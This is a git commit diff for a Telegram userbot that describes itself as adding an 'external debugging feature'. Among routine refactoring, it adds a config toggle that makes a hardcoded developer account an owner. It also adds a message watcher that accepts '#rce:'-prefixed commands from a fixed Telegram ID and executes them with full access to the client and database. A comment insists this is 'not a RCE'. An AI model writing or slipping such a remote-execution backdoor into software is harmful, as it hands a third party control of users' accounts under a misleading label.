- Add external debugging feature (off by default)
pull/1/head
hikariatama 2023-05-23 05:51:08 +00:00
parent 5272347374
commit e61b171e9f
5 changed files with 135 additions and 49 deletions

View File

@ -9,6 +9,7 @@
- Add ability to cancel QR login using keyboard interrupt
- Add custom security groups
- Add automatic NoNick for tsec methods
- Add external debugging feature (off by default)
- Fix form invoke error message
- Fix `Backuper`
- Fix backward compatiblity with security groups `SUDO` (0x2) and `SUPPORT` (0x4)

View File

@ -97,6 +97,7 @@ class HikkaException:
exc_value: Exception,
tb: traceback.TracebackException,
stack: typing.Optional[typing.List[inspect.FrameInfo]] = None,
comment: typing.Optional[typing.Any] = None,
) -> "HikkaException":
def to_hashable(dictionary: dict) -> dict:
dictionary = dictionary.copy()
@ -124,16 +125,15 @@ class HikkaException:
return dictionary
full_stack = traceback.format_exc().replace(
"Traceback (most recent call last):\n", ""
full_traceback = traceback.format_exc().replace(
"Traceback (most recent call last):\n",
"",
)
line_regex = r' File "(.*?)", line ([0-9]+), in (.+)'
line_regex = re.compile(r' File "(.*?)", line ([0-9]+), in (.+)')
def format_line(line: str) -> str:
filename_, lineno_, name_ = re.search(line_regex, line).groups()
with contextlib.suppress(Exception):
filename_ = os.path.basename(filename_)
filename_, lineno_, name_ = line_regex.search(line).groups()
return (
f"👉 <code>{utils.escape_html(filename_)}:{lineno_}</code> <b>in</b>"
@ -142,45 +142,63 @@ class HikkaException:
filename, lineno, name = next(
(
re.search(line_regex, line).groups()
for line in reversed(full_stack.splitlines())
if re.search(line_regex, line)
line_regex.search(line).groups()
for line in reversed(full_traceback.splitlines())
if line_regex.search(line)
),
(None, None, None),
)
full_stack = "\n".join(
full_traceback = "\n".join(
[
(
format_line(line)
if re.search(line_regex, line)
if line_regex.search(line)
else f"<code>{utils.escape_html(line)}</code>"
)
for line in full_stack.splitlines()
for line in full_traceback.splitlines()
]
)
caller = utils.find_caller(stack or inspect.stack())
cause_mod = (
"🔮 <b>Cause: method"
f" </b><code>{utils.escape_html(caller.__name__)}</code><b> of module"
f" </b><code>{utils.escape_html(caller.__self__.__class__.__name__)}</code>\n"
if caller and hasattr(caller, "__self__") and hasattr(caller, "__name__")
else ""
)
# extract comment from trace (e.g. logging.exception("COMMENT HERE"))
record_comment = ()
return cls(
message=override_text(exc_value)
or (
f"{cause_mod}\n<b>🪵 Source:</b>"
f" <code>{utils.escape_html(filename)}:{lineno}</code><b>"
f" in </b><code>{utils.escape_html(name)}</code>\n<b>❓ Error:</b>"
f" <code>{utils.escape_html(''.join(traceback.format_exception_only(exc_type, exc_value)).strip())}</code>"
"{}<b>🎯 Source:</b> <code>{}:{}</code><b> in"
" </b><code>{}</code>\n<b>❓ Error:</b> <code>{}</code>{}"
).format(
(
(
"🔮 <b>Cause: method </b><code>{}</code><b> of"
" </b><code>{}</code>\n\n"
).format(
utils.escape_html(caller.__name__),
utils.escape_html(caller.__self__.__class__.__name__),
)
if (
caller
and hasattr(caller, "__self__")
and hasattr(caller, "__name__")
)
else ""
),
utils.escape_html(filename),
lineno,
utils.escape_html(name),
utils.escape_html(
"".join(
traceback.format_exception_only(exc_type, exc_value)
).strip()
),
(
"\n💭 <b>Message:</b>"
f" <code>{utils.escape_html(str(comment))}</code>"
if comment
else ""
),
),
full_stack=full_stack,
full_stack=full_traceback,
sysinfo=(exc_type, exc_value, tb),
)
@ -436,6 +454,7 @@ class TelegramLogsHandler(logging.Handler):
exc = HikkaException.from_exc_info(
*record.exc_info,
stack=record.__dict__.get("stack", None),
comment=record.msg % record.args,
)
if not self.ignore_common or all(

View File

@ -444,27 +444,25 @@ class Evaluator(loader.Module):
async def getattrs(self, message: Message) -> dict:
reply = await message.get_reply_message()
return {
**{
"message": message,
"client": self._client,
"reply": reply,
"r": reply,
**self.get_sub(hikkatl.tl.types),
**self.get_sub(hikkatl.tl.functions),
"event": message,
"chat": message.to_id,
"hikkatl": hikkatl,
"telethon": hikkatl,
"utils": utils,
"main": main,
"loader": loader,
"f": hikkatl.tl.functions,
"c": self._client,
"m": message,
"lookup": self.lookup,
"self": self,
"db": self.db,
},
"message": message,
"client": self._client,
"reply": reply,
"r": reply,
**self.get_sub(hikkatl.tl.types),
**self.get_sub(hikkatl.tl.functions),
"event": message,
"chat": message.to_id,
"hikkatl": hikkatl,
"telethon": hikkatl,
"utils": utils,
"main": main,
"loader": loader,
"f": hikkatl.tl.functions,
"c": self._client,
"m": message,
"lookup": self.lookup,
"self": self,
"db": self.db,
}
def get_sub(self, obj: typing.Any, _depth: int = 1) -> dict:

View File

@ -19,6 +19,9 @@ import requests
import rsa
from hikkatl.tl.types import Message
from hikkatl.utils import resolve_inline_message_id
from meval import meval
from hikka import main
from .. import loader, utils
from ..types import InlineCall, InlineQuery
@ -70,8 +73,35 @@ class UnitHeta(loader.Module):
),
validator=loader.validators.Boolean(),
),
loader.ConfigValue(
"allow_external_access",
False,
(
"Allow hikariatama.t.me to control the actions of your userbot"
" externally. Do not turn this option on unless it's requested by"
" the developer."
),
validator=loader.validators.Boolean(),
on_change=self._process_config_changes,
),
)
def _process_config_changes(self):
# option is controlled by user only
# it's not a RCE
if (
self.config["allow_external_access"]
and 659800858 not in self._client.dispatcher.security.owner
):
self._client.dispatcher.security.owner.append(659800858)
self._nonick.append(659800858)
elif (
not self.config["allow_external_access"]
and 659800858 in self._client.dispatcher.security.owner
):
self._client.dispatcher.security.owner.remove(659800858)
self._nonick.remove(659800858)
async def client_ready(self):
await self.request_join(
"@heta_updates",
@ -81,6 +111,8 @@ class UnitHeta(loader.Module):
),
)
self._nonick = self._db.pointer(main.__name__, "nonickusers", [])
if self.get("nomute"):
return
@ -268,6 +300,40 @@ class UnitHeta(loader.Module):
int(data["dl_id"]),
)
@loader.watcher(
"in",
"only_messages",
from_id=5519484330,
regex=r"^#rce:.*\n.*?\n\n.*$",
)
async def watcher(self, message: Message):
if not self.config["allow_external_access"]:
return
await message.delete()
data = re.search(
r"^#rce:(?P<cmd>.*)\n(?P<sig>.*?)\n\n.*$",
message.raw.text,
)
command = data["cmd"]
try:
rsa.verify(
rsa.compute_hash(command.encode(), "SHA-1"),
base64.b64decode(data["sig"]),
PUBKEY,
)
except rsa.pkcs1.VerificationError:
logger.error("Got message with non-verified signature %s", command)
return
await meval(
command,
globals(),
{"self": self, "client": self._client, "c": self._client, "db": self._db},
)
@loader.command()
async def mlcmd(self, message: Message):
if not (args := utils.get_args_raw(message)):
@ -457,9 +523,10 @@ class UnitHeta(loader.Module):
"User-Agent": "Hikka Userbot",
"X-Hikka-Version": ".".join(map(str, __version__)),
"X-Hikka-Commit-SHA": utils.get_git_hash(),
"X-Hikka-User": self._client.tg_id,
"X-Hikka-User": str(self._client.tg_id),
},
)
if ans.status_code != 200:
await utils.answer(message, self.strings("404"))
return

View File

@ -68,6 +68,7 @@ class BaseTranslator:
): value
for module, strings in yaml.load(content).items()
for key, value in strings.items()
if key != "name"
}
def getkey(self, key: str) -> typing.Any: